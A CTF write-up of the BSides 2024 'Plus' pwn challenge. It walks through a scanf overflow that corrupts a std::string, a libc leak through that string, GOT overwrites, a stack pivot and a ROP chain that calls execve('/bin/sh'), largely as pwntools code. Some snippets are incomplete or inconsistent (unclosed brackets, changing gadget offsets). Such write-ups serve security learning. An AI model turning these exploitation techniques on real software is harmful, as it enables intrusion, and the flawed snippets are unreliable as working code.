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29 September 2024

Cybears CTF | Plus Writeup

by adamt

My writeup of the first Pwn challenge for Bsides 24 CTF.

Challenge Description

Straight away, running the binary we get told this is a C++ challenge involving the different string types (char* vs std::string).

I’m pretty bad at reversing C++, but from what i can tell:

  1. In the main function, a std::string object on the stack is initialized to “std::string”.
  2. The binary calls into a function vuln and passes this object as an argument.
  3. Within vuln(), a C string is initialized on the stack, and c-string is strcpy’ed into it.
  4. The program then allows a user to enter an arbitrary number of characters into this string via scanf. This is the main vulnerability in this challenge.
  5. The program then prints out “Please enter a “, followed by the argument string containing “std::string”
    • I have a feeling this will be a leak of some sort, why would they write it this way??
  6. After this, the user is prompted for a non-overflowable input via std::cin into the passed-in std::string object.

Protections wise, the binary has No PIE enabled, which should make things a bit easier.


Ok so we know the vulnerability is probably an overflow in the scanf call into our C string.

The first thing I notice when trying to fuzz input into the binary is around 112 characters.

$ pwn cyclic 111 | ./plus
Please enter a C string:
Please enter a std::string:
Your strings are:

$ pwn cyclic 112 | ./plus
Please enter a C string:
Please enter a /7��
Your strings are:

Notice the “std::string” has been replaced with random bytes! It’s pretty obvious we are somehow overwriting the std::string object initialized within the main function.

Doing a bit of research into how a std::string is represented on the stack, I learn that depending on the size of the string, the contents may be either locally allocated on the stack or the heap. Regardless, the overall layout of a std::string is

| Pointer         |  // Pointer to character data
| Size            |  // e.g., 5 for "Hello"
| Capacity        |  // e.g., 15 (or more)

So if my understanding is correct, we are likely overwriting the pointer slightly (with a NULL byte) when sending exactly 100 bytes. This will give for a pretty simply read and write primitive.

Read Primitive

Given we can overwrite the pointer and size of a std::string object, and this same object is printed to the user, we can use this to leak any value in memory. I will use this primitive to defeat ASLR and find an address in LIBC.

This little concept script will do this for us.

p = process("./plus")
payload = fit({112: p.elf.got['__isoc99_scanf'], 120: p64(0x8)})
p.sendlineafter(b'string', (payload)
p.recvuntil(b'enter a ')
leak = u64(p.recvuntil(b':', drop=True)
log.info("Leaked 0x%x", hex(leak))

Trying it out, and we successfully leak what looks like a LIBC address

$ python3 script.py
[*] leaked 0x74793965fe00

The challenge provided a libc that we can then use to pivot to any other libc addresses.

Write Primitive

We can take advantage of the fact that the program reads into the same std::string object. We can’t make it point somewhere new, but since it already points into LIBC, we can now overwrite a GOT address to anything, allowing us to control code execution.

The program calls exit at the end, exit appears directly after scanf in the GOT, so by leaking scanf, we can trivially overwrite exit after 8 bytes in the second payload.

Turning this write primitive into a shell

My first attempt here was to use a one_gadget as we only control one gadget. This didn’t work because

After this failed, my only option is to stack-pivot into a full ROP chain, and call system or execve. I decided to call execve because I hate myself.

Calling execve requires setting a minimum of 3 registers

Our current payload is not on the stack though, and finding a stack-pivot gadget to pivot to the GOT might be non-trivial. But wait, our previous input into the program is on the stack!

We can re-use the initial payload to insert of rop-chain into the stack, and then in our second payload, we can force a stack pivot down to where our first buffer begins. Some debugging in GDB shows this is 24 bytes into the stack, our stack-pivot needs to only pop 3 things of the stack.

I quickly find a pop r13; pop r14; pop r15; ret gadget, which redirects RSP to point to the beginning of our initial payload.

At this point our payload will look like.

payload1 = fit({
    0: rop_chain,
    # Overwrite Pointer of std::string to GOT
    112: elf.got['__isoc99_scanf'],
    # Overwrite size of std::string to 8
    120: p64(0x8),

triplepopgadget = p64(libc.address+0x000000000002a3e5)
# Overwrite exit GOT to `pop;pop;pop;ret` stack pivot.
payload2 = cyclic(8) + triplepopgadget

Building a ROP Chain

One issue with this approach so far is our initial payload needs to contain the ROP chain, but it happens before we get a LIBC leak. The binary won’t have good gadgets for us, we need to use LIBC gadgets.

We will take advantage of the way the PLT/GOT works to solve this. In our initial payload, we can put PLT function calls as our gadgets, which we can then force-overwrite when controlling the GOT in our second payload. With this our payload becomes

# 0x402350 is the PLT of the first GOT address we control, and so on.
payload1 = fit({
    # We will replace this with a pop RDI gadget.
    0: p64(0x402350), 
    # The GOT for scanf will point to /bin/sh in our second payload.
    8: elf.got['__isoc99_scanf'], # pop /bin/sh into RDI

    # We will replace this with a pop RDX gadget.
    16: p64(0x402350+16), # Second ROP gadget, the next PLT call
    24: p64(0), # pop zero into rdx

    32: p64(0x402350+32), # Will replace with address of execve 

    # Overwrite Pointer of std::string to GOT
    112: elf.got['__isoc99_scanf'],
    # Overwrite size of std::string to 8
    120: p64(0x8),

# pop;pop;pop;ret
triplepopgadget = p64(libc.address+0x000000000002a3e0)
# pop rdi; ret;
poprdi = p64(libc.address+0x000000000002a3e5)
# pop rdx; ret 6;
poprdx = p64(libc.address+0x0000000000170337) 

# Overwrite exit GOT to `pop;pop;pop;ret` stack pivot.
payload2 = fit({
    # Overwrite scanf GOT with /bin/sh.
    0: b'/bin/sh\x00',

    # Overwrite exit GOT with stack pivot
    8: triplepopgadget,

    # Overwrite subsequent GOT after exit to our gadgets.
    16: poprdi,
    24: poprdx,
    32: libc.symbols['execve'],

And we get out shell
